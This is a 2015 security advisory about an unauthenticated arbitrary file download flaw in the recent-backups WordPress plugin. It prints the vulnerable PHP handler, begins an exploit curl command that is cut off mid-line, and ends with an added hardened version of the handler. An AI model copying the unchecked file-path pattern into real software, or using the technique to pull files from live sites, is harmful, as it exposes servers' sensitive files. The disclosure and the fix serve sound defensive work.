Date: Tue, 14 Jul 2015 17:25:57 -0400
From: "Larry W. Cashdollar" <>
To: Open Source Security <>
Subject: Remote file download vulnerability in recent-backups v0.7 wordpress

Title: Remote file download vulnerability in recent-backups v0.7 wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-13
Download Site:
Vendor Notified: 2015-07-13
Vendor Contact:
Description: To be used with the BackupWordPress plugin to list the contents of the backup directory in a dashboard widget.
The code in download-file.php neither verifies that the user is logged in nor sanitizes which files can be downloaded. This vulnerability can be used to download sensitive system files:

<?php
// download-file.php as shipped in recent-backups v0.7: the request parameter is
// used directly as a filesystem path, with no login check and no restriction on
// which directory the file may come from (the vulnerable behaviour is kept here).
$file = $_GET['file_link'];

if (file_exists($file)) {
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename='.basename($file));
    header('Content-Transfer-Encoding: binary');
    header('Expires: 0');
    header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
    header('Pragma: public');
    header('Content-Length: ' . filesize($file));
    ob_clean();
    flush();
    readfile($file);   // any readable file on the server is sent to the client
}

Exploit Code:
	• $ curl -v "
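For comparison, a hardened version of the download handler, added here as an illustration and not code from the plugin or from the advisory author. It assumes the script runs inside WordPress (so the WP API is available), that the plugin issues a nonce named recent_backups_download with its download links, and that BACKUP_DIR (a placeholder) is the plugin's real backup directory.

```php
<?php
// Hardened replacement for download-file.php (example, not the plugin's code).
// BACKUP_DIR is a placeholder: substitute the directory the plugin really uses.
define( 'BACKUP_DIR', WP_CONTENT_DIR . '/backups' );

// 1. Authentication and authorization: the original handler had neither.
if ( ! is_user_logged_in() || ! current_user_can( 'manage_options' ) ) {
    wp_die( 'Not allowed', '', array( 'response' => 403 ) );
}

// 2. CSRF protection: the download link must carry a nonce issued by the plugin
//    (assumed action name; check_admin_referer() dies on a missing/invalid nonce).
check_admin_referer( 'recent_backups_download' );

// 3. Input restriction: accept only a bare file name, never a path.
$name = isset( $_GET['file_link'] ) ? basename( wp_unslash( $_GET['file_link'] ) ) : '';
if ( '' === $name || $name !== sanitize_file_name( $name ) ) {
    wp_die( 'Invalid file name', '', array( 'response' => 400 ) );
}

// 4. Containment: resolve symlinks and confirm the file sits inside BACKUP_DIR.
//    realpath() returns false for non-existent paths, which is rejected too.
$base = realpath( BACKUP_DIR );
$path = realpath( BACKUP_DIR . '/' . $name );
if ( false === $base || false === $path
     || 0 !== strpos( $path, $base . DIRECTORY_SEPARATOR )
     || ! is_file( $path ) ) {
    wp_die( 'File not found', '', array( 'response' => 404 ) );
}

// 5. Serve the file; only the checked, resolved path is ever passed to readfile().
header( 'Content-Description: File Transfer' );
header( 'Content-Type: application/octet-stream' );
header( 'Content-Disposition: attachment; filename="' . $name . '"' );
header( 'Content-Length: ' . filesize( $path ) );
header( 'Cache-Control: no-store' );
if ( ob_get_level() ) {
    ob_end_clean();
}
readfile( $path );
exit;
```

The realpath() comparison is what closes the path-traversal hole; the capability and nonce checks close the unauthenticated-access hole the advisory describes.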
